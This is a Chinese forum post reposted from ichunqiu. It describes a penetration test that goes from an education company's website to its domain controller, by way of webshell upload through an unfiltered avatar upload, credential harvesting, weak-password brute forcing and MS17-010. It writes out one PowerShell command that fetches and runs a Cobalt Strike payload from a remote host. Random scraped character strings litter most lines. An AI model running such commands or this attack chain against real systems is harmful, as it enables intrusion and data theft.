|
; l( _/ r% P( J# d
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
$ q* i6 f9 I' T" g, @ v
& l% L) l- `2 Y) U+ d+ ]" a
+ h5 P. ~+ d1 c9 L 9 g4 C' I m# z. ]% z, C, P* i
7 m }" a8 w% h: [# _
* k; M; M3 r( G2 a! `5 U' q) {/ ? 正文
) h D- ]5 @9 Y
4 @% C+ q% k1 ]3 h4 R( z% g2 c$ W* {5 n: G: H# T, o
9 g( Y J5 v" v4 V) K* w7 e
/ Q0 ^3 I0 ?2 @% S# J; P c# {" `5 b) N9 h4 o$ D
目标:www.xxxx.com(一家教育机构)
4 Y+ }5 |. I' @2 j$ A
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能5 ~$ u) x! t& s6 H/ b5 |! \
( e* n( s( y7 ]% b3 k; C' ~
[$ I1 v: y1 O
# W8 }( O0 C9 L
2 y0 F& F0 q: B' r5 }. y$ P C4 O/ i3 \9 ^
进行了简单的信息搜集
/ v, S% e% Q3 C3 i" K
8 |8 O! z1 R1 L
1 ]5 [+ P" y! ?
+ c3 O& k3 k+ l8 e
- ]: c K9 x* x4 {8 p; Y* g9 y8 F 子域名搜集/ A, h+ r2 m u7 R
( b9 m9 ?) l+ L$ i/ Y
( E8 w4 l4 U2 L9 S* x- z* _" e) B
 & b" ~. K* F- Q5 P
, W$ i! w/ z% [; @5 W# @+ j
" }, w1 S& J' r8 L9 d fofa找资产
T7 h* O/ G/ y' h6 r8 j
J; E9 Z7 w9 X5 i b
1 V" T, h. y+ y& b
# b L1 t u; Y' r1 Y c" ?" N/ H6 u2 H
 - V6 e, l5 [- z6 j
: M( y8 h# M( i+ v3 F# H
9 S! L7 G6 V, `/ b0 y. L: p: h
一共七个资产。去重之后只有两个。
6 {: ^$ J- q1 M: C
' q3 n" c! v: k' ^. R/ g1 }2 i: b
. o D2 v1 G% X+ Q) O9 q% w5 N
- Q! [- p" ?8 ~% c& ^- A
( G; _- s% W! E2 A- F$ F
目录探测' J3 `% ]% I# i2 z% [0 g
8 |2 m3 _% L. D7 v* R/ [/ G$ ~% U
' U8 ~( w# W& D& S$ R. E& Z  ) L2 j8 Y0 \" d, l" R
+ `* n' K/ {! H
7 ?8 W* }! t0 \' t+ G5 k* N 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
% l* s/ A; q( g- y4 x% \
. n# r) F$ b2 f3 |! j/ @! h" e) q
" i- U4 z# R& [- v) {) E
) C+ a. R$ R" K 我又尝试了通过修改返回包来绕过登录界面
# V$ G+ x! H3 B5 |" [$ k) [
( f7 e+ q' g" X. b% q3 d9 J
# A* K6 Q* H7 C [ W+ r% i 
3 N. G1 ?0 o& P . `; J* |; y2 Z/ A) O
! v$ [8 j0 n, @! j8 Q
还是不行,尝试注入无果& ], E# L# _) y/ {0 X. R
% B! ~$ Z) M$ P2 Z4 h9 v8 ^! S, s: I# G, p
 7 r1 K; p$ h9 C6 G/ g
+ s, ^* u( M% u- O7 ^
+ G$ } W! A7 }$ b0 N$ A, j
不过我目录探测出了一处Spring信息泄露
8 L! R$ R/ {' c4 t7 m1 b
! R6 T. a! n7 b% m6 k& J) G
# R- D6 k8 \: b. i ! l( f1 k7 ^6 z3 o
, Q x2 D' b8 n- F: p4 U  ; r9 h7 b. r, o$ F: L: i5 U
4 z' Q7 c- G! Q5 R+ d9 v7 V. B; Y0 Z% c: O) G- C9 I
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
+ |* }( S" H& t$ b1 C/ G 9 U+ Q+ ^) T4 e. A% _5 f+ | j7 C
. V4 d8 L: s% A/ E1 ?( b 
. Z3 o3 B' |! X: {2 ]4 z* H3 q * P# L' a2 s/ Z
' _$ b8 Q# b8 K
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。+ W$ A" n) ?0 y% t( J
6 D4 V4 s( |5 Z7 ?) I
( V0 s& B2 t* {4 i, c6 W
- J1 z$ A5 p5 ~* p' m' t" G1 } 3 ]% E w& `3 z0 [( N8 ?
8 I0 z$ V7 B9 I J 获取有些师傅到这一步就手机抓包电脑测了。
5 E( l: d& m" A( H: @: n
0 V9 J1 k- ^* e4 k
0 v, r7 v0 K) E4 s2 B( a4 q Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。: a0 ^. ?1 A: z x2 @ r' j
- z* i, ] w; [3 `
/ x/ s7 w; Y7 j3 I
其中在一个公众号发现了小程序,可以进行注册。: Y9 g7 S3 T: ?$ W
/ u: C8 D ?8 f7 Z
( b/ t( J1 p1 d% W( I$ y 看到了头像上传,尝试上传获取WebShell9 o1 F. ]5 l' V9 O5 m& d/ ^
* g. E2 v8 v/ ?* }$ V6 R; R9 D
- r1 N7 ~* T' D1 w 
$ _" o5 P- Z+ U) ~; s- c, Q( g/ o5 ], C ( v7 D5 m" @' H" |
. X2 V4 ~ ~9 ]6 t0 S
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
3 Z& p6 t& a& D& Y
* \+ o) G7 v' ~. a
1 L7 _- I! o* t" t 
. E' y, w9 h) R% G9 z) s2 D) ~
9 y9 r9 |2 |- a# U2 I
* R3 W1 _8 J9 S7 _* u 然后上了大马
, z) v6 ?3 i( U! w9 f, e `
" ?- A# b9 ^' c8 e& e! S' J0 i7 V. U" ^3 D
 1 S. V, l# A* C4 w
; T! K1 ]; y& L) z/ }( {
- W# s9 \ P( V" M
& i6 P6 d. ^( n 4 _: n- ~. q& x- M2 z$ d: g8 B7 G
0 W5 f; E6 w6 R0 X" C$ h 通过翻找文件发现数据库账号密码- |( u0 V9 b) N1 D! E' ~: k1 q
+ V; B4 B0 @8 A* `- ~
0 ~6 C! l4 q% F) d h 
9 I( L$ l( @3 [$ | F. x
( g, _8 a. t0 _5 P3 A3 p T# ?( _7 l8 L2 ^2 S
--内网渗透
; `1 T% ` q/ h& f6 G, x : K2 i0 L9 H9 M) B
3 n# u* u; Q7 H. r
直接通过powershell执行 cs上线
2 W" d8 E% r) W/ p
7 Y; d( J+ B/ {! ~
8 q+ a9 M4 S' G5 R1 G powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
+ I2 C7 O" N K$ s ) z* b5 A8 U: w0 Q1 \0 S
! f9 X' z& R, `; ?) D. V, D/ N
% R5 ?0 W8 m7 Z( j s. R' n' D2 x( ~
w: S* P; E' }9 |1 t# B, T2 S& B; _( b2 C
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破8 x1 M+ F+ i* A: H- Z% l4 v/ r
- o1 k r# E2 C1 U
' e: Y4 M4 Y+ ? 
) h* ^" e; U0 H* z% A
: J' d7 i2 D: o- f, P! O2 a) \0 m- t, n, N% K" ~' [' g j: [/ {
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
& B% {$ u+ X$ e
; i6 N8 L7 d; \2 o
# _, B) l$ h A" h1 c o
. g3 X% i0 W1 _1 G }- f 3 Q8 g7 N0 I# E
3 R" C2 x6 F R( ?- i& ~ 
$ b+ E- J, [. @4 K$ [$ a3 c. M: a
7 w5 [( J; i. E$ O0 c3 S9 D' n
; Z( r+ G3 p+ }$ ?% a% \ 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
- C3 n& L. h- j8 K( S* F$ O3 C
* ~9 S$ @# `8 \+ \" O* V
4 J7 [4 g, M; }' Q! g
! k( }0 d# ^) x5 D8 I/ Q. c( c! ~2 e7 I. F+ ^4 P- U/ D* c o% ~
 6 f( @3 n* p' x2 j
d* L3 O0 f2 e$ i
3 u q- ^2 O1 |+ p0 P3 y
1 o2 ]4 K) f s
1 Y2 _& H. h! Q- @/ n0 i2 s) G- I5 ~3 m c; P0 K# y
o+ e, w6 S' p5 k. S- B+ z" F: v0 X# a _; A# |4 ]9 @% h
- S; j2 \0 Q) c: x
$ X" O! q. G) J E$ N4 D J5 f+ m
小结7 a' ~" l% E# H) N1 L
8 a2 y. Z" p9 t2 }
* Y. V9 X$ e2 y# H2 V, a6 e 6 J7 N' _( Z% t( E% D
, a$ B; [/ g t6 B7 j$ Z" H
3 P- h/ l, O% S 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!' c# ]4 C! M+ n7 ]( Y
- u% Y1 B; p' i5 r0 i
# y$ X! o3 H h+ S+ B3 a
2 W4 w: r: x Z5 ` / d0 a' X) g7 f) |: l6 E
+ X, u/ g' T, I. N2 I - ! e; \- f3 ]( ^& I. _
% r. l4 e+ ], B9 T( H) H+ L- L
2 i% ]5 `' P1 L0 e! c+ o5 \5 c
- 1 Z" Q# l* ]! K% Q, I$ k
; }; _1 [9 R" ~. k3 P
6 v" I: O: X. n0 `
/ b2 f* h1 `* ~1 @
0 m% L( N) E% G: v+ x7 Q; B" P 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
% L- U9 M% Z0 n, l0 D( I; C0 `7 Q1 V" Q
4 e1 P0 Z* Y. Y* r! W) Y6 z. K$ \
4 A# M3 s! _+ T8 b9 z - j; j; c8 P' j2 C( H; E2 ^
| 
发表于 2024-3-1 19:41:32
收藏
支持
反对